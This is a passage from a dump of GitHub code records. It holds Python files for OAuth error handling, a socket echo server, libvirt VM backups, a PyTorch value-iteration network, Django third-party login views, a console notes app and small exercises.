ClassVar[str] = 'invalid_request'\n\n class InvalidToken(ResourceServerResponseError):\n ERROR_NAME: ClassVar[str] = 'invalid_token'\n\n class InsufficientScope(ResourceServerResponseError):\n ERROR_NAME: ClassVar[str] = 'insufficient_scope'\n\nclass UnrecognizedResourceServerResponseError(ResourceServerResponseError):\n pass\n\nresource_server_response_error_by_error_name: Mapping[str, type[ResourceServerResponseError]] = {\n cls.ERROR_NAME: cls\n for cls in [\n ResourceServerResponseError,\n ResourceServerResponseErrorTypes.InvalidRequest,\n ResourceServerResponseErrorTypes.InvalidToken,\n ResourceServerResponseErrorTypes.InsufficientScope,\n ]\n}\n\ndef raise_for_resource_server_response_error(json_dict: Any) -> None:\n error_name = json_dict.get('error')\n if error_name is None:\n return\n\n cls = resource_server_response_error_by_error_name.get(\n error_name, UnrecognizedResourceServerResponseError)\n raise cls(\n error_name=error_name,\n description=json_dict.get('error_description', ''),\n help_uri=json_dict.get('error_uri', ''),\n )\n\n_auth_param_pattern = r'''(?P(\\w+))=((?P\\\")(?P([^\\\"]*))(?P=q)|(?P=value))'''\n_auth_param_regex = re.compile(_auth_param_pattern)\n\ndef extract_www_authenticate_auth_params(resp: Response) -> Mapping[str, str]:\n try:\n www_authenticate = resp.headers['WWW-Authenticate']\n except KeyError:\n return {}\n\n # Parsing the WWW-Authenticate header in a RFC-2617 spec compliant way is a daunting task.\n # Just use regex for now.\n return {m['key']: m['value'] for m in _auth_param_regex.finditer(www_authenticate)}\n","repo_name":"Pyprohly/redditwarp","sub_path":"redditwarp/auth/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":5356,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"} +{"seq_id":"32643345574","text":"#!/usr/bin/env python3\nimport sys\nimport socket\nimport selectors\nimport types\n\n\"\"\"\nBaseSelector\n - SelectSelector : select.select()\n - PollSelector : select.poll()\n - EpollSelector : select.epoll()\n - DevpollSelector : select.devpoll()\n - KqueueSelector : select.kqueue()\n\nDefaultSelector: is an alias to the most efficient implementation available on the current platform\n\"\"\"\nsel = selectors.DefaultSelector()\n\n\ndef accept_wrapper(sock):\n conn, addr = sock.accept() # Should be ready to read\n print(f\"accepted {conn} from {addr}\")\n conn.setblocking(False) # configure the socket in non-blocking mode.\n data = types.SimpleNamespace(addr=addr, inb=b\"\", outb=b\"\")\n events = selectors.EVENT_READ | selectors.EVENT_WRITE\n # register(fileobj, events, data=None)\n sel.register(conn, events, data=data) # registers the socket to be monitored\n\n\ndef service_connection(key, mask):\n sock = key.fileobj # the socket object\n data = key.data\n if mask & selectors.EVENT_READ:\n recv_data = sock.recv(1024) # Should be ready to read\n if recv_data:\n data.outb += recv_data\n else:\n print(\"closing connection to\", data.addr)\n sel.unregister(sock)\n sock.close()\n if mask & selectors.EVENT_WRITE:\n if data.outb:\n print(\"echoing\", repr(data.outb), \"to\", data.addr)\n sent = sock.send(data.outb) # Should be ready to write\n data.outb = data.outb[sent:]\n\n\nif len(sys.argv) != 3:\n print(\"usage:\", sys.argv[0], \" \")\n sys.exit(1)\n\n\nhost, port = sys.argv[1], int(sys.argv[2])\nlsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nlsock.bind((host, port))\nlsock.listen()\nprint(\"listening on\", (host, port))\n# sock.setblocking(True) is equivalent to sock.settimeout(None)\n# sock.setblocking(False) is equivalent to sock.settimeout(0.0)\nlsock.setblocking(False)\n\n# Register a file object for selection, monitoring it for I/O events\nsel.register(lsock, selectors.EVENT_READ, data=None)\n\n\n# the event loop\ntry:\n while True:\n # blocks until there are sockets ready for I/O\n events = sel.select(timeout=None)\n for key, mask in events:\n if key.data is None:\n accept_wrapper(key.fileobj)\n else:\n service_connection(key, mask)\nexcept KeyboardInterrupt:\n print(\"caught keyboard interrupt, exiting\")\nfinally:\n sel.close()\n","repo_name":"chyidl/begin-again","sub_path":"docs/programming_language/python/src/sockets/multiconn-server.py","file_name":"multiconn-server.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"38946386709","text":"import arrow\nimport json\nimport libvirt\nimport logging\nimport lxml.etree\nimport os\nimport subprocess\nimport tarfile\n\nimport virt_backup\nfrom virt_backup.backups.packagers import ReadBackupPackagers, WriteBackupPackagers\nfrom virt_backup.compat_layers.pending_info import (\n convert as compat_convert_pending_info,\n)\nfrom virt_backup.domains import get_xml_block_of_disk\nfrom virt_backup.exceptions import CancelledError\nfrom virt_backup.tools import copy_file\nfrom . import _BaseDomBackup\nfrom .snapshot import DomExtSnapshot\n\n\nlogger = logging.getLogger(\"virt_backup\")\n\n\ndef build_dom_backup_from_pending_info(\n pending_info, backup_dir, conn, callbacks_registrer\n):\n compat_convert_pending_info(pending_info)\n kwargs = {\n \"dom\": conn.lookupByName(pending_info[\"domain_name\"]),\n \"backup_dir\": backup_dir,\n \"dev_disks\": tuple(pending_info.get(\"disks\", {}).keys()),\n \"callbacks_registrer\": callbacks_registrer,\n }\n if pending_info.get(\"packager\"):\n kwargs[\"packager\"] = pending_info[\"packager\"].get(\"type\")\n kwargs[\"packager_opts\"] = pending_info[\"packager\"].get(\"opts\", {})\n\n backup = DomBackup(**kwargs)\n backup.pending_info = pending_info\n\n return backup\n\n\nclass DomBackup(_BaseDomBackup):\n \"\"\"\n Libvirt domain backup\n \"\"\"\n\n def __init__(\n self,\n dom,\n backup_dir=None,\n dev_disks=None,\n packager=\"tar\",\n packager_opts=None,\n conn=None,\n timeout=None,\n disks=None,\n ext_snapshot_helper=None,\n callbacks_registrer=None,\n quiesce=False,\n ):\n \"\"\"\n :param dev_disks: list of disks dev names to backup. Disks will be\n searched in the domain to pull more informations, and\n an exception will be thrown if one of them is not\n found\n :param disks: dictionary of disks to backup, in this form:\n `{\"src\": disk_path, \"type\": disk_format}`. Prefer\n using dev disks when possible.\n \"\"\"\n super().__init__()\n\n #: domain to backup. Has to be a libvirt.virDomain object\n self.dom = dom\n\n #: directory where backups will be saved\n self.backup_dir = backup_dir\n\n #: disks to backups. If None, will backup every vm disks\n self.disks = {}\n if dev_disks:\n self.disks.update(self._get_self_domain_disks(*dev_disks))\n if disks:\n self.disks.update(self._get_self_domain_disks(*disks))\n if not self.disks:\n self.disks = self._get_self_domain_disks()\n\n #: string indicating how to compress the backups:\n # * None/dir: no compression, backups will be only copied\n # * \"tar\": backups will be packaged in a tarfile (compression available\n # through packager_opts)\n self.packager = packager or \"directory\"\n\n #: dict of packager options.\n self.packager_opts = dict(packager_opts) if packager_opts else {}\n\n #: libvirt connection to use. If not sent, will use the connection used\n # for self.domain\n self.conn = self.dom._conn if conn is None else conn\n\n #: timeout when waiting for the block pivot to end. Infinite wait if\n # timeout is None\n self.timeout = timeout\n\n #: quiesce enable the Livirt Quiesce options when taking the external snapshot.\n # It allows to freeze the filesystem before the snapshot, but requires qemu\n # guest agent to run inside the VM.\n self.quiesce = quiesce\n\n #: droppable helper to take and clean external snapshots. Can be\n # construct with an ext_snapshot_helper to clean the snapshots of an\n # aborted backup. Starting a backup will erase this helper.\n self._ext_snapshot_helper = ext_snapshot_helper\n\n #: used to redistribute events received by libvirt, as one event cannot\n # be registered for multiple times. Necessary if no\n # `ext_snapshot_helper` is given.\n self._callbacks_registrer = callbacks_registrer\n\n if not (ext_snapshot_helper or callbacks_registrer):\n raise AttributeError(\n \"callbacks_registrer needed if no ext_snapshot_helper is given\"\n )\n\n #: useful info collected during a pending backup, allowing to clean\n # the backup if anything goes wrong\n self.pending_info = {}\n\n #: store the backup name (usually generated with the internal format)\n self._name = \"\"\n\n #: Used as lock when the backup is already running\n self._running = False\n\n @property\n def running(self):\n return self._running\n\n def add_disks(self, *dev_disks):\n \"\"\"\n Add disk by dev name\n\n .. warning::\n\n Adding a disk during a backup is not recommended, as the current\n disks list could be inaccurate. It will pull the informations\n about the current disks attached to the domain, but the backup\n process creates temporary external snapshots, changing the current\n disks attached. This should not be an issue when the backingStore\n property will be correctly handled, but for now it is.\n\n :param dev_disk: dev name of the new disk to backup. If not indicated,\n will add all disks.\n \"\"\"\n dom_all_disks = self._get_self_domain_disks()\n if not dev_disks:\n self.disks = dom_all_disks\n for dev in dev_disks:\n if dev in self.disks:\n continue\n self.disks[dev] = dom_all_disks[dev]\n\n def cancel(self):\n self._cancel_flag.set()\n\n def start(self):\n \"\"\"\n Start the entire backup process for all disks in self.disks\n \"\"\"\n assert not self.running\n assert self.dom and self.backup_dir\n self._cancel_flag.clear()\n\n if not os.path.exists(self.backup_dir):\n os.mkdir(self.backup_dir)\n\n logger.info(\"%s: Backup started\", self.dom.name())\n definition = self.get_definition()\n definition[\"disks\"] = {}\n\n try:\n self._running = True\n self._ext_snapshot_helper = self._get_ext_snapshot_helper()\n\n snapshot_date, definition = self._snapshot_and_save_date(definition)\n\n self._name = self._main_backup_name_format(snapshot_date)\n definition[\"name\"], self.pending_info[\"name\"] = self._name, self._name\n self._dump_json_definition(definition)\n self._dump_pending_info()\n\n packager = self._get_packager()\n # TODO: handle backingStore cases\n with packager:\n for disk, prop in self.disks.items():\n if self._cancel_flag.is_set():\n raise CancelledError()\n\n self._backup_disk(disk, prop, packager, definition)\n self._ext_snapshot_helper.clean_for_disk(disk)\n\n self._dump_json_definition(definition)\n self.post_backup()\n self._clean_pending_info()\n except:\n self.clean_aborted()\n raise\n finally:\n self._running = False\n logger.info(\"%s: Backup finished\", self.dom.name())\n\n def _get_ext_snapshot_helper(self):\n return DomExtSnapshot(\n self.dom,\n self.disks,\n self._callbacks_registrer,\n self.conn,\n self.timeout,\n quiesce=self.quiesce,\n )\n\n def _get_packager(self):\n assert self._name, \"_name attribute needs to be defined to get a packager\"\n return self._get_write_packager(self._name)\n\n def _snapshot_and_save_date(self, definition):\n \"\"\"\n Take a snapshot of all disks to backup and mark date into definition\n\n All disks are frozen when external snapshots have been taken, so we\n consider this step to be the backup date.\n\n :return snapshot_date, definition: return snapshot_date as `arrow`\n type, and the updated definition\n \"\"\"\n snapshot_metadatas = self._ext_snapshot_helper.start()\n\n # all of our disks are snapshot, so the backup date is right now\n definition[\"date\"] = snapshot_metadatas[\"date\"].int_timestamp\n\n self.pending_info = definition.copy()\n self.pending_info[\"disks\"] = {\n disk: {\n \"src\": prop[\"src\"],\n \"snapshot\": snapshot_metadatas[\"disks\"][disk][\"snapshot\"],\n \"type\": snapshot_metadatas[\"disks\"][disk][\"type\"],\n }\n for disk, prop in self.disks.items()\n }\n self._dump_pending_info()\n\n return snapshot_metadatas[\"date\"], definition\n\n def get_definition(self):\n \"\"\"\n Get a json defining this backup\n \"\"\"\n return {\n \"domain_id\": self.dom.ID(),\n \"domain_name\": self.dom.name(),\n \"domain_xml\": self.dom.XMLDesc(),\n \"packager\": {\"type\": self.packager, \"opts\": self.packager_opts},\n \"version\": virt_backup.VERSION,\n }\n\n def _backup_disk(self, disk, disk_properties, packager, definition):\n \"\"\"\n Backup a disk and complete the definition by adding this disk\n\n :param disk: diskname to backup\n :param disk_properties: dictionary discribing our disk (typically\n contained in self.disks[disk])\n :param packager: a BackupPackager object\n :param definition: dictionary representing the domain backup\n \"\"\"\n snapshot_date = arrow.get(definition[\"date\"]).to(\"local\")\n logger.info(\"%s: Backup disk %s\", self.dom.name(), disk)\n bak_img = \"{}.{}\".format(\n self._disk_backup_name_format(snapshot_date, disk), disk_properties[\"type\"]\n )\n self.pending_info[\"disks\"][disk][\"target\"] = bak_img\n self._dump_pending_info()\n\n if definition.get(\"disks\", None) is None:\n definition[\"disks\"] = {}\n definition[\"disks\"][disk] = bak_img\n\n packager.add(disk_properties[\"src\"], bak_img, self._cancel_flag)\n\n def _disk_backup_name_format(self, snapdate, disk_name, *args, **kwargs):\n \"\"\"\n Backup name format for each disk when no compression/compacting is set\n\n :param snapdate: date when external snapshots have been created\n :param disk_name: disk name currently being backup\n \"\"\"\n return \"{}_{}\".format(self._main_backup_name_format(snapdate), disk_name)\n\n def post_backup(self):\n \"\"\"\n Post backup process\n\n Unregister callback and close backup_target if is tarfile\n \"\"\"\n if self._ext_snapshot_helper is not None:\n self._ext_snapshot_helper.clean()\n self._ext_snapshot_helper = None\n self._running = False\n\n def _parse_dom_xml(self):\n \"\"\"\n Parse the domain's definition\n \"\"\"\n return lxml.etree.fromstring(\n self.dom.XMLDesc(), lxml.etree.XMLParser(resolve_entities=False)\n )\n\n def _dump_json_definition(self, definition):\n \"\"\"\n Dump the backup definition as json\n\n Definition will describe our backup, with the date, backuped\n disks names and other informations\n \"\"\"\n backup_date = arrow.get(definition[\"date\"]).to(\"local\")\n definition_path = self._get_json_definition_path(backup_date)\n with open(definition_path, \"w\") as json_definition:\n json.dump(definition, json_definition, indent=4)\n\n def _clean_definition(self, definition={}):\n backup_date = arrow.get(definition.get(\"date\", self.pending_info[\"date\"])).to(\n \"local\"\n )\n os.remove(self._get_json_definition_path(backup_date))\n\n def _get_json_definition_path(self, backup_date):\n return os.path.join(\n self.backup_dir,\n \"{}.{}\".format(self._main_backup_name_format(backup_date), \"json\"),\n )\n\n def _dump_pending_info(self):\n \"\"\"\n Dump the temporary changes done, as json\n\n Useful\n \"\"\"\n json_path = self._get_pending_info_json_path()\n with open(json_path, \"w\") as json_pending_info:\n json.dump(self.pending_info, json_pending_info, indent=4)\n\n def _clean_pending_info(self):\n os.remove(self._get_pending_info_json_path())\n self.pending_info = {}\n\n def _get_pending_info_json_path(self):\n backup_date = arrow.get(self.pending_info[\"date\"]).to(\"local\")\n json_path = os.path.join(\n self.backup_dir,\n \"{}.{}.pending\".format(self._main_backup_name_format(backup_date), \"json\"),\n )\n return json_path\n\n def clean_aborted(self):\n is_ext_snap_helper_needed = (\n not self._ext_snapshot_helper and self.pending_info.get(\"disks\", None)\n )\n if is_ext_snap_helper_needed:\n self._ext_snapshot_helper = self._get_ext_snapshot_helper()\n self._ext_snapshot_helper.metadatas = {\n \"disks\": {\n disk: {\n \"src\": val[\"src\"],\n \"snapshot\": val[\"snapshot\"],\n \"type\": val[\"type\"],\n }\n for disk, val in self.pending_info[\"disks\"].items()\n }\n }\n\n if self._ext_snapshot_helper:\n self._ext_snapshot_helper.clean()\n\n # If the name couldn't have been written, no packager has been created.\n if \"name\" in self.pending_info:\n packager = self._get_write_packager(self.pending_info[\"name\"])\n try:\n targets = []\n for d in self.pending_info[\"disks\"].values():\n if \"target\" in d:\n targets.append(d[\"target\"])\n\n self._clean_packager(packager, targets)\n except FileNotFoundError:\n logger.info(\n \"%s: Packager not found, nothing to clean.\", self.dom.name()\n )\n\n if \"date\" in self.pending_info:\n for cleaning in (self._clean_definition, self._clean_pending_info):\n try:\n cleaning()\n except FileNotFoundError:\n # Info had no time to be filled, so had not be dumped.\n pass\n\n def compatible_with(self, dombackup):\n \"\"\"\n Is compatible with dombackup ?\n\n If the target is the same for both dombackup and self, same thing for\n packager and packager_opts, self and dombackup are considered\n compatibles.\n \"\"\"\n same_domain = dombackup.dom.UUID() == self.dom.UUID()\n if not same_domain:\n return False\n\n attributes_to_compare = (\"backup_dir\", \"packager\")\n for a in attributes_to_compare:\n if getattr(self, a) != getattr(dombackup, a):\n return False\n\n # compare the packager_opts by converting them to json and diffing the strings\n same_package_opts = json.dumps(\n self.packager_opts, sort_keys=True\n ) == json.dumps(dombackup.packager_opts, sort_keys=True)\n if not same_package_opts:\n return False\n\n return True\n\n def merge_with(self, dombackup):\n self.add_disks(*dombackup.disks.keys())\n timeout = self.timeout or dombackup.timeout\n self.timeout = timeout\n","repo_name":"aruhier/virt-backup","sub_path":"virt_backup/backups/pending.py","file_name":"pending.py","file_ext":"py","file_size_in_byte":15506,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"71"} +{"seq_id":"30190641242","text":"import sys\n_module = sys.modules[__name__]\ndel sys\ndataset = _module\ndataset = _module\nmake_training_data = _module\ndomains = _module\ngridworld = _module\ngenerators = _module\nobstacle_gen = _module\nmodel = _module\ntest = _module\ntrain = _module\nutility = _module\nutils = _module\n\nfrom _paritybench_helpers import _mock_config, patch_functional\nfrom unittest.mock import mock_open, MagicMock\nfrom torch.autograd import Function\nfrom torch.nn import Module\nimport abc, collections, copy, enum, functools, inspect, itertools, logging, math, matplotlib, numbers, numpy, pandas, queue, random, re, scipy, sklearn, string, tensorflow, time, torch, torchaudio, torchtext, torchvision, types, typing, uuid, warnings\nimport numpy as np\nfrom torch import Tensor\npatch_functional()\nopen = mock_open()\nyaml = logging = sys = argparse = MagicMock()\nArgumentParser = argparse.ArgumentParser\n_global_config = args = argv = cfg = config = params = _mock_config()\nargparse.ArgumentParser.return_value.parse_args.return_value = _global_config\nyaml.load.return_value = _global_config\nsys.argv = _global_config\n__version__ = '1.0.0'\nxrange = range\nwraps = functools.wraps\n\n\nimport numpy as np\n\n\nimport torch\n\n\nimport torch.utils.data as data\n\n\nimport torch.nn as nn\n\n\nimport torch.nn.functional as F\n\n\nimport torch.optim as optim\n\n\nfrom torch.nn.parameter import Parameter\n\n\nimport matplotlib.pyplot as plt\n\n\nfrom torch.autograd import Variable\n\n\nimport time\n\n\nimport torchvision.transforms as transforms\n\n\nclass VIN(nn.Module):\n\n def __init__(self, config):\n super(VIN, self).__init__()\n self.config = config\n self.h = nn.Conv2d(in_channels=config.l_i, out_channels=config.l_h, kernel_size=(3, 3), stride=1, padding=1, bias=True)\n self.r = nn.Conv2d(in_channels=config.l_h, out_channels=1, kernel_size=(1, 1), stride=1, padding=0, bias=False)\n self.q = nn.Conv2d(in_channels=1, out_channels=config.l_q, kernel_size=(3, 3), stride=1, padding=1, bias=False)\n self.fc = nn.Linear(in_features=config.l_q, out_features=8, bias=False)\n self.w = Parameter(torch.zeros(config.l_q, 1, 3, 3), requires_grad=True)\n self.sm = nn.Softmax(dim=1)\n\n def forward(self, X, S1, S2, config):\n h = self.h(X)\n r = self.r(h)\n q = self.q(r)\n v, _ = torch.max(q, dim=1, keepdim=True)\n for i in range(0, config.k - 1):\n q = F.conv2d(torch.cat([r, v], 1), torch.cat([self.q.weight, self.w], 1), stride=1, padding=1)\n v, _ = torch.max(q, dim=1, keepdim=True)\n q = F.conv2d(torch.cat([r, v], 1), torch.cat([self.q.weight, self.w], 1), stride=1, padding=1)\n slice_s1 = S1.long().expand(config.imsize, 1, config.l_q, q.size(0))\n slice_s1 = slice_s1.permute(3, 2, 1, 0)\n q_out = q.gather(2, slice_s1).squeeze(2)\n slice_s2 = S2.long().expand(1, config.l_q, q.size(0))\n slice_s2 = slice_s2.permute(2, 1, 0)\n q_out = q_out.gather(2, slice_s2).squeeze(2)\n logits = self.fc(q_out)\n return logits, self.sm(logits)\n\n","repo_name":"eladhoffer/pytorch-jit-paritybench","sub_path":"generated/test_kentsommer_pytorch_value_iteration_networks.py","file_name":"test_kentsommer_pytorch_value_iteration_networks.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"} +{"seq_id":"30215359650","text":"def chr_n_gram(s: str, n: int):\n return [s[i:i+n] for i in range(len(s) - n + 1)]\n\ndef main():\n s1 = \"paraparaparadise\"\n s2 = \"paragraph\"\n res1 = chr_n_gram(s1, 2)\n res1 = set(res1)\n res2 = chr_n_gram(s2, 2)\n res2 = set(res2)\n print(\"Union\", res1 | res2)\n print(\"Intersection\", res1 & res2)\n print(\"Difference\", res1 - res2)\n\n print(\"'se' in s1: \", \"se\" in res1)\n print(\"'se' in s2: \", \"se\" in res2)\n\nif __name__ == \"__main__\":\n main()","repo_name":"Percy08-dev/NLP_100problems","sub_path":"準備運動/06.py","file_name":"06.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"37241177056","text":"from Views.GetMenu import printMenu\nfrom Mechanisms.NoteOfMechanisms import NoteOfMechanisms\nfrom Models.JsonNote import JsonModel\nfrom Views.GetNote import View\nfrom Models.Note import Note\n\nimport datetime\n\n\ndef startMenu():\n \"\"\"\n Основная функция запуска программы.\n :return:\n \"\"\"\n c = NoteOfMechanisms(JsonModel(\"notes.json\"), View())\n while (True):\n print('Программа заметки:')\n printMenu()\n task = ''\n try:\n task = int(input('Введите от 1 до 7: '))\n except:\n print('Неверно введено число от 1 до 7')\n raise\n \n if task == 1: # Проверка введённого числа и запуск функции в основном фаиле\n print('\\nСоздание заметки.')\n c.create_note(get_note_data())\n elif task == 2:\n print('\\nПоказанть заметку.')\n if c.notes_exist():\n c.show_note(int(get_number()))\n elif task == 3:\n if c.notes_exist():\n print('\\nПоказать все заметки.')\n c.show_notes()\n elif task == 4:\n if c.notes_exist():\n print('\\nРедактировать заметку.')\n updated_id = int(get_number())\n if c.note_id_exist(updated_id):\n c.update_note(updated_id, get_note_data())\n elif task == 5:\n if c.notes_exist():\n print('\\nУдалить заметку!')\n delete_id = int(get_number())\n if c.note_id_exist(delete_id):\n c.delete_note(delete_id)\n elif task == 6:\n if c.notes_exist():\n print('Удалить все заметки!')\n if input('Вы уверены? (Y/N): ').capitalize() == 'Y':\n if c.notes_exist():\n c.delete_all_notes()\n elif task == 7:\n print('Выходим из программы')\n exit()\n else:\n print('Ошибка. Введите от 1 до 7.')\n\n\ndef get_note_data():\n note_id = 0\n date = datetime.datetime.now()\n title = input('Введите новое имя заметки: ')\n text = input('Введите новый текст заметки: ')\n return Note(note_id, date, title, text)\n\n\ndef get_number():\n while True:\n get_choice = input('Введите id заметки: ')\n if get_choice.isdigit() and int(get_choice) > 0:\n return get_choice\n else:\n print('\\t\\t\\tВведено неверное id заметки!')","repo_name":"MaksFromGeek/ControlWork","sub_path":"NotesApp/Mechanisms/GearMenu.py","file_name":"GearMenu.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"70346947430","text":"import datetime\nimport logging\nfrom urllib.parse import urlparse\n\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model, login\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import transaction\nfrom django.http import HttpResponseRedirect, HttpResponseForbidden\nfrom django.shortcuts import render, get_object_or_404\nfrom django.urls import reverse\nfrom django.views.generic import FormView\n\nfrom Blog.utils import get_current_site, get_md5\nfrom auth.authmanager import get_manager_by_type, AuthAccessTokenException\nfrom auth.forms import RequireEmailForm\nfrom auth.models import AuthUser\n\nlogger = logging.getLogger(__name__)\n\n# Create your views here.\ndef get_redirecturl(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n nexturl = request.GET.get('next_url', None)\n if not nexturl or nexturl == '/login/' or nexturl == '/login':\n nexturl = '/'\n return nexturl\n p = urlparse(nexturl)\n if p.netloc:\n site = get_current_site().domain\n if not p.netloc.replace('www.', '') == site.replace('www.', ''):\n logger.info('非法的url:' + nexturl)\n return '/'\n return nexturl\n\n\ndef authlogin(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n type = request.GET.get('type', None)\n if not type:\n return HttpResponseRedirect('/')\n manager = get_manager_by_type(type)\n if not manager:\n return HttpResponseRedirect('/')\n nexturl = get_redirecturl(request)\n authorizeurl = manager.get_authorization_url(nexturl)\n return HttpResponseRedirect(authorizeurl)\n\n\ndef authorize(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n type = request.GET.get('type', None)\n if not type:\n return HttpResponseRedirect('/')\n manager = get_manager_by_type(type)\n if not manager:\n return HttpResponseRedirect('/')\n code = request.GET.get('code', None)\n try:\n resp = manager.get_access_token_by_code(code)\n except AuthAccessTokenException as e:\n logger.warning('AuthAccessTokenException:' + str(e))\n return HttpResponseRedirect('/')\n except Exception as e:\n logger.error(e)\n resp = None\n nexturl = get_redirecturl(request)\n if not resp:\n return HttpResponseRedirect(manager.get_authorization_url(nexturl))\n user = manager.get_auth_userinfo()\n if user:\n if not user.nickname or not user.nickname.strip():\n user.nickname = 'blog' + datetime.datetime.now().strftime('%y%m%d%H%M%S')\n try:\n temp = AuthUser.objects.get(type=type, openid=user.openid)\n temp.picture = user.picture\n temp.matedata = user.matedata\n temp.nickname = user.nickname\n user = temp\n except ObjectDoesNotExist:\n pass\n\n if type == 'facebook':\n user.token = ''\n if user.email:\n with transaction.atomic():\n author = None\n try:\n author = get_user_model().objects.get(id=user.author_id)\n except ObjectDoesNotExist:\n pass\n\n if not author:\n result = get_user_model().objects.get_or_create(email=user.email)\n author = result[0]\n if result[1]:\n try:\n get_user_model().objects.get(username=user.nickname)\n except ObjectDoesNotExist:\n author.username = user.nickname\n else:\n author.username = 'blog' + datetime.datetime.now().strftime('%y%m%d%H%M%S')\n author.source = 'authorize'\n author.save()\n user.author = author\n user.save()\n\n auth_user_login_signal.send(sender=authorize.__class__, id=user.id)\n login(request, author)\n return HttpResponseRedirect(nexturl)\n else:\n user.save()\n url = reverse('auth:require_email', kwargs={'authid': user.id})\n return HttpResponseRedirect(url)\n else:\n return HttpResponseRedirect(nexturl)\n\n\ndef emailconfirm(request, id, sign):\n \"\"\"\n :param request:\n :param id:\n :param sign:\n :return:\n \"\"\"\n if not sign:\n return HttpResponseForbidden()\n if not get_md5(settings.SECRET_KEY + str(id) + settings.SECRET_KEY).upper() == sign.upper():\n return HttpResponseForbidden()\n authuser = get_object_or_404(AuthUser, pk=id)\n with transaction.atomic():\n if authuser.author:\n author = get_user_model().objects.get(pk=authuser.author_id)\n else:\n result = get_user_model().objects.get_or_create(email=authuser.email)\n author = result[0]\n if result[1]:\n author.source = 'emailconfirm'\n author.username = authuser.nickname.strip() if authuser.nickname.strip() else 'bolg' + datetime.datetime.now().strftime('%y%m%d%H%M%S')\n author.save()\n authuser.author = author\n author.save()\n auth_user_login_signal.send(sender=emailconfirm.__class__, id=authuser.id)\n login(request, author)\n site = get_current_site().domain\n content = f'''\n

恭喜您, 您已经成功绑定您的邮箱,您可以使用{type}来直接免密码登录\n '''\n send_email(emailto=[authuser.email, ], title='恭喜您绑定成功!', content=content)\n url = reverse('auth:bindsuccess', kwargs={'authid': id})\n url = url + '?type=success'\n return HttpResponseRedirect(url)\n\n\nclass RequireEmailView(FormView):\n \"\"\"docstring\"\"\"\n form_class = RequireEmailForm\n template_name = 'auth/require_email.html'\n\n def get(self, request, *args, **kwargs):\n authid = self.kwargs['authid']\n authuser = get_object_or_404(AuthUser, pk=authid)\n if authuser.email:\n return HttpResponseRedirect('/')\n return super(RequireEmailView, self).get(request, *args, **kwargs)\n\n def get_initial(self):\n authid = self.kwargs['authid']\n return {\n 'email': '',\n 'authid': authid,\n }\n\n def get_context_data(self, **kwargs):\n authid = self.kwargs['authid']\n authuser = get_object_or_404(AuthUser, pk=authid)\n if authuser.picture:\n kwargs['picture'] = authuser.picture\n return super(RequireEmailView, self).get_context_data(**kwargs)\n\n def form_valid(self, form):\n email = form.cleaned_data['email']\n authid = form.cleaned_data['authid']\n authuser = get_object_or_404(AuthUser, pk=authid)\n authuser.email = email\n authuser.save()\n sign = get_md5(settings.SECRET_KEY + str(authuser.id) + settings.SECRET_KEY)\n site = get_current_site().domain\n\n if settings.DEBUG:\n site = '127.0.0.1:8000'\n path = reverse('auth: email_confirm', kwargs={'id': authid, 'sign': sign})\n url = 'http://{site}{path}'.format(site=site, path=path)\n\n content = \"\"\"\n {url}\n \"\"\".format(url=url)\n senf_email(emailto=[email, ], title='绑定您的电子邮箱', content=content)\n url = reverse('auth: bindsuccess', kwargs={'authid': authid})\n url = url + \"?type=email\"\n return HttpResponseRedirect(url)\n\n\ndef bindsuccess(request, authid):\n \"\"\"\n :param request:\n :param authid:\n :return:\n \"\"\"\n type = request.GET.get('type', None)\n authuser = get_object_or_404(AuthUser, pk=authid)\n if type == 'email':\n title = 'bind success'\n content = ''\n else:\n title = 'bind success'\n content = '{type}'.format(type=authuser.type)\n return render(request, 'auth/bindsuccess.html', {'title': title, 'content': content})","repo_name":"FreeGodCode/TYCarry_Blog","sub_path":"auth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"25657523267","text":"# Write a Python program to get the maximum and\r\n# minimum value in a dictionary.\r\n\r\ndef get_min_max_value(dic):\r\n dic1={}\r\n dic1=dic.copy()\r\n min1= min(dic1.values())\r\n max1= max(dic1.values())\r\n return min1,max1\r\n\r\ndic1={1:10, 2:20}\r\ndic2={3:30, 4:40}\r\ndic3={5:50,6:60}\r\ndic3.update(dic2)\r\nprint('dic3 is',dic3)\r\nprint(\r\n f'min , max value in dic3 are :',get_min_max_value(dic3)\r\n)\r\n\r\n\r\n# Write a Python program to remove \r\n# duplicates from Dictionary.\r\n\r\ndic={\r\n 1:10, \r\n 2:20 ,\r\n 3:30, \r\n 4:40 , \r\n 5:50,\r\n 6:60 ,\r\n 1:10, \r\n 2:20 ,\r\n 3:30\r\n}\r\n\r\nresult={}\r\n\r\nfor key,value in dic.items():\r\n if key not in result:\r\n result[key]=value\r\n\r\nprint('\\ndictionary without duplicates : ')\r\nprint( result )","repo_name":"Kailashmandal/Python-with-Kailash","sub_path":"practice21.py","file_name":"practice21.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"18502986670","text":"import re\r\nintent_keywords = {\r\n 'self':['your','you','yourself'],\r\n 'greet': ['hi','morning','hello','welcome','Hey','Nice to meet you'],\r\n 'time': ['time', 'clock'],\r\n 'date':['date','day','calendar','today'],\r\n \"search\":['search',\"when\",\"what\",\"why\",\"how\",\"who\",\"where\"],\r\n 'relax':[\"relax\"],\r\n 'location':['find','track'],\r\n 'close': ['close'],\r\n 